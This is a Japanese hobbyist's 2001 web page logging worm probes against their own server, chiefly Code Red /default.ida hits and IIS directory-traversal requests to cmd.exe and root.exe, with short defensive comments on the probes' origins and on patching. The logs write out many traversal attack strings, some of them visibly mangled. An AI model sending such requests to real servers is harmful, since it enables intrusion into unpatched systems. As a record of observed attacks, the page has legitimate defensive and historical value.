/scripts/root.exe 404 0 13:39:24 61.73.97.212 - GET /MSADC/root.exe 404 10 13:39:24 61.73.97.212 - GET /c/winnt/system32/cmd.exe 404 0 13:39:29 61.73.97.212 - GET /d/winnt/system32/cmd.exe 404 0 13:39:30 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10 13:39:30 61.73.97.212 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:39:31 61.73.97.212 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:39:31 61.73.97.212 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0 13:39:33 61.73.97.212 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0 13:39:33 61.73.97.212 - GET /scripts/winnt/system32/cmd.exe 404 10 13:39:37 61.73.97.212 - GET /winnt/system32/cmd.exe 404 0 13:39:38 61.73.97.212 - GET /winnt/system32/cmd.exe 404 10 13:39:38 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:39:42 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10 13:39:42 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:39:43 61.73.97.212 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0久々の更新ですね。いや CodeRed の攻撃多すぎて、とても全部を掲載していられないので何か 動きがあったら更新しようと思ってたのですが、とうとうありましたよ。
#Date: 2001-08-02 14:03:36 23:37:31 62.60.75.173 - GET /default.ida 404 23:40:51 62.254.221.3 - GET /default.ida 404 #Date: 2001-08-03 00:56:39 00:56:39 24.13.230.41 - GET /default.ida 404 01:08:42 216.248.154.226 - GET /default.ida 404 01:22:30 208.40.145.142 - GET /default.ida 404 01:29:41 142.179.62.193 - GET /default.ida 404 01:35:21 211.188.33.4 - GET /default.ida 404 02:45:36 203.93.37.42 - GET /default.ida 404 03:00:25 65.66.188.3 - GET /default.ida 404 04:00:23 64.107.156.168 - GET /default.ida 404 04:10:03 211.180.221.212 - GET /default.ida 404 05:09:23 24.52.100.232 - GET /default.ida 404 05:25:25 203.246.52.158 - GET /default.ida 404 05:38:19 207.172.209.160 - GET /default.ida 404 06:30:42 62.103.238.219 - GET /default.ida 404 07:11:54 65.33.97.201 - GET /default.ida 404 09:01:50 193.183.19.99 - GET /default.ida 404 09:49:25 63.239.112.125 - GET /default.ida 404 10:05:58 66.66.236.116 - GET /default.ida 404 11:21:08 207.44.254.108 - GET /default.ida 404 12:33:03 62.174.98.137 - GET /default.ida 404 13:00:48 140.136.94.230 - GET /default.ida 404 13:22:39 211.57.244.123 - GET /default.ida 404 13:37:15 61.73.63.18 - GET /default.ida 404 14:08:34 203.204.61.117 - GET /default.ida 404 16:42:02 24.88.246.152 - GET /default.ida 404 17:09:05 64.174.199.242 - GET /default.ida 404 17:13:54 65.29.114.195 - GET /default.ida 404 19:17:18 202.111.10.187 - GET /default.ida 404 20:03:57 213.82.68.162 - GET /default.ida 404 20:07:03 158.64.30.2 - GET /default.ida 404 20:20:21 208.60.168.131 - GET /default.ida 404 21:08:02 202.183.141.90 - GET /default.ida 404 21:16:58 194.237.252.234 - GET /default.ida 404 21:21:16 24.250.51.202 - GET /default.ida 404 23:25:57 194.255.126.5 - GET /default.ida 404 #Date: 2001-08-04 00:00:16 00:00:16 62.98.163.72 - GET /default.ida 404 00:51:29 210.67.201.74 - GET /default.ida 404 00:57:01 12.10.209.125 - GET /default.ida 404 01:13:14 147.83.143.142 - GET /default.ida 404 01:35:18 211.78.40.103 - GET /default.ida 404 02:42:27 211.221.72.120 - GET /default.ida 404 05:12:12 217.68.67.130 - GET /default.ida 404 06:16:34 202.85.86.107 - GET /default.ida 404 07:15:31 128.163.239.199 - GET /default.ida 404 09:32:47 217.226.172.234 - GET /default.ida 404 10:19:45 206.97.191.135 - GET /default.ida 404 10:39:10 202.184.98.210 - GET /default.ida 404 11:01:46 216.196.131.141 - GET /default.ida 404 11:12:09 211.183.29.6 - GET /default.ida 404 11:29:16 61.216.78.214 - GET /default.ida 404 11:48:27 61.141.127.236 - GET /default.ida 404 11:58:48 63.167.117.1 - GET /default.ida 404 11:59:38 61.216.132.18 - GET /default.ida 404 12:01:23 61.182.110.85 - GET /default.ida 404 12:36:12 203.75.176.34 - GET /default.ida 404 12:42:52 61.10.133.71 - GET /default.ida 404 12:58:07 158.182.51.247 - GET /default.ida 404 13:04:36 61.75.51.247 - GET /default.ida 404 13:12:24 61.115.128.190 - GET /default.ida 404 13:16:32 61.115.213.165 - GET /default.ida 404 13:19:16 193.171.51.33 - GET /default.ida 404 13:29:25 61.115.179.177 - GET /default.ida 404 13:32:50 61.115.160.140 - GET /default.ida 404 13:34:10 61.74.121.187 - GET /default.ida 404 13:39:28 63.195.72.239 - GET /default.ida 404 13:42:07 61.115.128.190 - GET /default.ida 404 13:55:24 61.115.128.190 - GET /default.ida 404 13:59:17 61.115.119.201 - GET /default.ida 404 14:01:13 61.188.113.199 - GET /default.ida 404 14:04:51 61.74.156.196 - GET /default.ida 404 14:07:29 61.79.193.18 - GET /default.ida 404 14:11:08 61.115.179.177 - GET /default.ida 404 14:13:30 61.164.90.149 - GET /default.ida 404 14:27:40 61.135.18.166 - GET /default.ida 404 14:31:52 61.79.192.89 - GET /default.ida 404 14:37:29 61.56.196.2 - GET /default.ida 404 14:42:13 61.10.236.46 - GET /default.ida 404 14:43:32 61.150.175.194 - GET /default.ida 404 14:46:39 61.73.14.245 - GET /default.ida 404 14:48:04 61.115.178.87 - GET /default.ida 404 14:56:35 61.115.119.201 - GET /default.ida 404 15:13:45 61.115.90.25 - GET /default.ida 404 15:39:45 61.217.220.40 - GET /default.ida 404 15:42:47 61.115.186.165 - GET /default.ida 404 15:50:45 61.115.90.25 - GET /default.ida 404 15:57:06 61.139.112.198 - GET /default.ida 404 15:57:06 61.10.76.193 - GET /default.ida 404 16:02:35 61.115.186.165 - GET /default.ida 404 16:20:34 61.140.153.133 - GET /default.ida 404 16:25:29 61.216.71.237 - GET /default.ida 404 16:39:09 61.115.238.161 - GET /default.ida 404 16:40:44 203.246.182.41 - GET /default.ida 404 16:53:43 216.112.77.117 - GET /default.ida 404 17:01:19 61.158.214.221 - GET /default.ida 404 17:02:04 61.18.235.184 - GET /default.ida 404 17:04:58 61.10.126.62 - GET /default.ida 404 17:11:08 211.202.42.16 - GET /default.ida 404 17:12:13 217.10.197.22 - GET /default.ida 404 17:15:39 61.16.121.235 - GET /default.ida 404 17:16:41 61.152.25.81 - GET /default.ida 404 17:21:53 61.129.76.30 - GET /default.ida 404 17:45:46 61.115.238.161 - GET /default.ida 404 17:48:25 61.144.184.114 - GET /default.ida 404 18:04:30 61.74.125.205 - GET /default.ida 404 18:31:41 61.115.65.239 - GET /default.ida 404 18:32:52 61.188.192.246 - GET /default.ida 404 18:51:31 61.115.238.161 - GET /default.ida 404 19:00:04 61.115.65.239 - GET /default.ida 404 19:04:03 61.115.224.163 - GET /default.ida 404 19:07:12 61.76.39.6 - GET /default.ida 404 19:46:47 61.221.5.42 - GET /default.ida 404 19:47:21 4.41.77.51 - GET /default.ida 404 19:54:22 61.115.119.201 - GET /default.ida 404 19:56:36 61.115.99.101 - GET /default.ida 404 20:11:05 65.104.213.52 - GET /default.ida 404 20:30:34 61.216.86.17 - GET /default.ida 404 20:56:33 211.188.80.2 - GET /default.ida 404 20:58:03 61.115.65.239 - GET /default.ida 404 21:05:26 216.187.238.203 - GET /default.ida 404 21:23:52 61.33.18.2 - GET /default.ida 404 21:40:52 61.32.92.145 - GET /default.ida 404 21:45:28 61.115.238.161 - GET /default.ida 404 21:46:09 61.115.179.177 - GET /default.ida 404 22:10:33 61.81.67.235 - GET /default.ida 404 22:10:55 61.13.57.253 - GET /default.ida 404 22:16:56 61.115.179.177 - GET /default.ida 404 22:26:42 61.115.220.48 - GET /default.ida 404 22:28:29 61.115.133.142 - GET /default.ida 404 22:38:49 61.115.238.161 - GET /default.ida 404 22:41:21 61.115.133.142 - GET /default.ida 404 22:42:45 61.218.94.188 - GET /default.ida 404 22:45:00 63.204.48.120 - GET /default.ida 404 22:53:07 61.84.195.84 - GET /default.ida 404 22:56:34 61.115.133.142 - GET /default.ida 404 23:10:09 211.20.244.134 - GET /default.ida 404 23:13:26 61.120.108.5 - GET /default.ida 404 23:26:20 61.220.68.62 - GET /default.ida 404 23:28:06 61.143.233.99 - GET /default.ida 404 23:54:27 61.158.105.39 - GET /default.ida 404 23:57:50 61.115.178.87 - GET /default.ida 404飽きるほど来ましたよ。 「Code Red」 らしきアクセスが〜
#Date: 2001-08-01 14:33:47 14:33:47 202.100.13.129 - GET /default.ida 404 17:05:27 212.199.104.227 - GET /default.ida 404 18:38:50 195.57.143.7 - GET /default.ida 404 20:14:15 194.170.253.47 - GET /default.ida 404 20:20:43 61.132.121.212 - GET /default.ida 404 20:51:25 213.96.244.234 - GET /default.ida 404 21:09:21 24.124.57.153 - GET /default.ida 404 22:22:21 63.30.197.48 - GET /default.ida 404 22:36:39 202.98.106.239 - GET /default.ida 404 23:26:20 211.175.240.135 - GET /default.ida 404 23:48:29 62.218.24.69 - GET /default.ida 404 #Date: 2001-08-02 00:36:38 00:36:38 211.36.178.27 - GET /default.ida 404 01:24:32 210.5.16.34 - GET /default.ida 404 01:25:55 24.190.38.230 - GET /default.ida 404 02:59:44 216.113.67.122 - GET /default.ida 404 03:01:37 210.160.130.67 - GET /default.ida 404 03:06:05 61.132.219.62 - GET /default.ida 404 03:08:04 65.32.41.176 - GET /default.ida 404 03:33:46 216.103.85.166 - GET /default.ida 404 03:41:24 128.134.246.211 - GET /default.ida 404 03:54:49 61.150.159.232 - GET /default.ida 404 04:47:12 211.224.129.151 - GET /default.ida 404 04:49:52 212.76.164.2 - GET /default.ida 404 04:54:07 202.98.45.144 - GET /NULL.idq 404 05:04:00 211.100.92.95 - GET /default.ida 404 07:15:08 213.82.74.251 - GET /default.ida 404 08:57:34 210.15.77.214 - GET /default.ida 404 09:20:03 61.176.55.221 - GET /default.ida 404 11:02:58 213.207.9.66 - GET /default.ida 404 11:25:28 207.164.206.125 - GET /default.ida 404 13:37:08 63.145.2.69 - GET /default.ida 404 13:42:19 192.197.118.105 - GET /default.ida 404 13:45:39 12.38.162.98 - GET /default.ida 404 14:03:36 4.35.243.180 - GET /default.ida 404 15:25:46 210.95.5.61 - GET /default.ida 404 15:31:18 216.205.200.51 - GET /default.ida 404 15:40:45 216.199.98.67 - GET /default.ida 404 16:50:48 12.101.8.34 - GET /default.ida 404 17:16:08 211.104.106.2 - GET /default.ida 404 18:29:17 64.236.8.142 - GET /default.ida 404 19:45:18 216.62.159.214 - GET /default.ida 404 20:27:02 202.229.9.26 - GET /default.ida 404 20:45:29 203.59.97.25 - GET /default.ida 404 21:11:48 66.92.168.87 - GET /default.ida 404 22:34:24 147.46.48.45 - GET /default.ida 404 23:06:27 211.40.36.157 - GET /default.ida 404 23:08:53 211.79.147.1 - GET /default.ida 404来ました来ました大量に。 「Code Red」 ですな。
アクセス元IP アドレス : 61.151.231.33 2001/07/31 17:02:12 - GET /scripts/..%5c%5c../winnt/system32/cmd.exe 500また1ステップのアクセスですねぇ。これも結構流行ってるようで、量は少ないけど 定期的に攻撃ありますな。
アクセス元IP アドレス : 210.72.224.240 2001/07/27 22:32:49 - GET /winnt/system32/cmd.exe 404 2001/07/27 22:32:54 - GET /winnt/system32/cmd.exe 404 2001/07/27 22:32:55 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/07/27 22:32:57 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/07/27 22:32:58 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/07/27 22:33:09 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/07/27 22:33:11 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/07/27 22:33:15 - GET /winnt/system32/cmd.exe 404 2001/07/27 22:33:17 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/07/27 22:33:28 - GET /winnt/system32/cmd.exe 404 2001/07/27 22:33:52 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/27 22:33:57 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/27 22:33:58 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/27 22:33:59 - GET /winnt/system32/cmd.exe 404また Solaris のワームです。 相手はまたまた中国。
アクセス元IP アドレス : 128.97.254.98 2001/07/23 22:53:48 - GET /default.ida 404 アクセス元IP アドレス : 216.252.197.109 2001/07/20 07:01:06 - GET /default.ida 404また「Code Red」ワームらしい攻撃です。 詳しい情報はここ を参照してください。
アクセス元IP アドレス : 210.178.12.111 2001/07/20 15:05:32 - GET /winnt/system32/cmd.exe 404 2001/07/20 15:05:36 - GET /winnt/system32/cmd.exe 404 2001/07/20 15:05:40 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/07/20 15:05:42 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/07/20 15:05:45 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/07/20 15:05:48 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/07/20 15:05:51 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/07/20 15:05:54 - GET /winnt/system32/cmd.exe 404 2001/07/20 15:05:58 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/07/20 15:06:03 - GET /winnt/system32/cmd.exe 404 2001/07/20 15:06:07 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 15:06:12 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 15:06:17 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 15:06:21 - GET /winnt/system32/cmd.exe 404 アクセス元IP アドレス : 24.176.130.103 2001/07/20 21:25:45 - GET /winnt/system32/cmd.exe 404 2001/07/20 21:25:45 - GET /winnt/system32/cmd.exe 404 2001/07/20 21:25:46 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/07/20 21:26:11 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/07/20 21:26:11 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/07/20 21:26:12 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/07/20 21:26:12 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/07/20 21:26:13 - GET /winnt/system32/cmd.exe 404 2001/07/20 21:26:17 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/07/20 21:26:17 - GET /winnt/system32/cmd.exe 404 2001/07/20 21:26:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 21:26:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 21:26:24 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/20 21:26:35 - GET /winnt/system32/cmd.exe 404また Solaris のワームです(これ)。
208.46.6.130 2001/07/19 16:59:21 - GET /default.ida 200 202.181.208.122 2001/07/19 17:09:47 - GET /default.ida 200 129.81.209.8 2001/07/19 17:24:25 - GET /default.ida 200 202.234.168.34 2001/07/19 17:51:18 - GET /default.ida 200 210.159.9.210 2001/07/19 18:02:12 - GET /default.ida 200 209.17.157.204 2001/07/19 18:07:01 - GET /default.ida 200 198.162.104.16 2001/07/19 18:25:07 - GET /default.ida 200 193.128.148.94 2001/07/19 19:59:51 - GET /default.ida 200 196.36.199.25 2001/07/19 20:38:43 - GET /default.ida 200 210.12.4.99 2001/07/19 20:41:18 - GET /default.ida 200 216.120.108.3 2001/07/19 20:46:04 - GET /default.ida 200 64.183.14.67 2001/07/19 20:28:06 - GET /default.ida 200 203.235.201.205 2001/07/19 22:14:20 - GET /default.ida 200 211.254.138.92 2001/07/19 22:17:51 - GET /default.ida 200 65.80.91.58 2001/07/19 22:25:22 - GET /default.ida 200 195.144.47.202 2001/07/19 22:35:35 - GET /default.ida 200 211.61.231.112 2001/07/19 23:32:36 - GET /default.ida 200新種の攻撃ですね。IISのセキュリティーホールを狙う新種の「Code Red」というワーム が出回っているようなので、それかもしれません。 詳しい情報はここ を参照してください。
アクセス元IP アドレス : 203.69.5.162 2001/07/14 15:17:46 - GET /winnt/system32/cmd.exe 404 2001/07/14 19:01:39 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500これは台湾ですね。例のワームではないようです。 2回目のトライが4時間後ということは、半手動なのかな〜
アクセス元IP アドレス : 210.126.251.154 2001/07/14 05:58:13 - GET /winnt/system32/cmd.exe 404 2001/07/14 05:58:14 - GET /winnt/system32/cmd.exe 404 2001/07/14 05:58:16 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/07/14 05:58:16 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/07/14 05:58:17 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/07/14 05:58:17 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/07/14 05:58:19 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/07/14 05:58:19 - GET /winnt/system32/cmd.exe 404 2001/07/14 05:58:21 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/07/14 05:58:22 - GET /winnt/system32/cmd.exe 404 2001/07/14 05:58:23 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/14 05:58:24 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/14 05:58:25 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/07/14 05:58:26 - GET /winnt/system32/cmd.exe 404また Solaris のワームです(これ)。 Korea Network Information Center とゆーことで韓国ですな。困ったもんだ。
また不思議な ftp アクセスがありましたよ。
今度はドイツからです。web じゃなくて直接 ftp で来てるんですよね。
アクセス元IP アドレス : 217.57.152.11 2001/06/22 03:07:39 - GET /winnt/system32/cmd.exe 404 2001/06/22 03:07:41 - GET /winnt/system32/cmd.exe 404 2001/06/22 03:07:42 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/06/22 03:07:46 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/06/22 03:07:46 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/06/22 03:07:47 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/06/22 03:07:47 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/06/22 03:07:48 - GET /winnt/system32/cmd.exe 404 2001/06/22 03:07:50 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/06/22 03:07:51 - GET /winnt/system32/cmd.exe 404 2001/06/22 03:07:52 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/22 03:07:53 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/22 03:07:54 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/22 03:07:55 - GET /winnt/system32/cmd.exe 404また Solaris のワームです(これ)。 IPによると、イタリアですね。
アクセス元IP アドレス : 209.154.248.209 2001/06/16 12:55:14 - GET /winnt/system32/cmd.exe 404 2001/06/16 12:55:14 - GET /winnt/system32/cmd.exe 404 2001/06/16 12:55:15 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/06/16 12:55:15 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/06/16 12:55:15 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/06/16 12:55:16 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/06/16 12:55:16 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/06/16 12:55:17 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/06/16 12:55:17 - GET /winnt/system32/cmd.exe 404 2001/06/16 12:55:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/16 12:55:19 - GET /winnt/system32/cmd.exe 404 2001/06/16 12:55:20 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/16 12:55:20 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/16 12:55:22 - GET /winnt/system32/cmd.exe 404これも例のワームのようです(これ)。 IPによると、アメリカの通信会社ですね。サブドメインなんで会社内もしくは管理下のサーバーでしょうか? tracert で経路探ったところちゃんと相手に到達しましたのでサーバーなのは間違いないようです。 最近 IP ドメイン検索が上手くいかないようなんで直接 ARIN で探しました。
アクセス元IP アドレス : 210.204.185.1 2001/06/09 11:34:44 - GET /winnt/system32/cmd.exe 404 2001/06/09 11:34:44 - GET /winnt/system32/cmd.exe 404 2001/06/09 11:34:45 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500 2001/06/09 11:34:45 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500 2001/06/09 11:34:45 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500 2001/06/09 11:34:46 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500 2001/06/09 11:34:46 - GET /scripts/..チ../winnt/system32/cmd.exe 500 2001/06/09 11:34:46 - GET /winnt/system32/cmd.exe 404 2001/06/09 11:34:48 - GET /scripts/..o../winnt/system32/cmd.exe 404 2001/06/09 11:34:48 - GET /winnt/system32/cmd.exe 404 2001/06/09 11:34:49 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/09 11:34:49 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/09 11:34:51 - GET /scripts/..ッ../winnt/system32/cmd.exe 404 2001/06/09 11:34:51 - GET /winnt/system32/cmd.exe 404完全に Windows NT/2000 + IIS をターゲットにした進入行為ですね。 これは有名なワームそのもののアクセス手順です。以前とは違ってしつこいのがおわかりでしょう。 これです。 となると相手は Solaris ということでしょうか。
操作自体は妖しくないのでログは掲載しませんが、ftp 系だけ匿名アクセスでしかも台湾なんてちょっと不思議です。 ftp検索エンジンの仕業なのか、はたまた??
アクセス元IP アドレス : 217.81.171.41 2001/05/27 10:32:16 anonymous 21 [17]USER anonymous 331 0 0 0 - - 2001/05/27 10:32:16 guest@here.com 21 [17]PASS guest@here.com 230 0 0 80 - - 2001/05/27 10:32:19 guest@here.com 21 [17]MKD 010527123603p 550 0 0 0 - - 2001/05/27 10:32:26 guest@here.com 21 [17]MKD 010527123610p 550 0 0 0 - -初のちょっと妖しい ftp 系アクセスです。悪意は図りかねますな。なんか匿名でディレクトリを作ってなにをするつもりやら。 えろ画像でも上げようというのか、はたまた巨大ファイルをアップして転覆を図るのか.....。 しかし、謎の場所からの発信なんて Altavista の ftp サーチにでも登録されたのかなぁ。
06:59:32 202.100.13.11 GET /winnt/system32/cmd.exe 404なんかまた別のところから同種のアタックをしてきてますね。やはり、同種のワーム・ロボットなんでしょうか?
00:10:52 211.100.2.75 GET /winnt/system32/cmd.exe 404 00:10:54 211.100.2.75 GET /winnt/system32/cmd.exe 404 00:10:56 211.100.2.75 GET /scripts/..チ%pc../winnt/system32/cmd.exe 500Windows NT/2000 + IIS をターゲットにした進入行為と思われます。 デフォルトでのインストールがされていて、web のルートがドライブのルートに設定してあり セキュリティをちゃんと設置していないと最初の2行で危険なことになりますね。 3行目は、IIS のセキュリティホールを狙っているらしいです。パッチ当てていれば問題はありません。 有名なワームと動きは似ていますが、あきらめるのが早いんで違うワームかもしれませんね。 参考までにここもどうぞ。
16:58:25 140.130.88.1 GET /winnt/system32/cmd.exe 404こちらは一回こっきりのアクセスです。ということは相手は有名なワームではなくて別のワーム もしくはロボット、はたまた手動アクセスでしょうか?いずれにせよ、かなり妖しいです。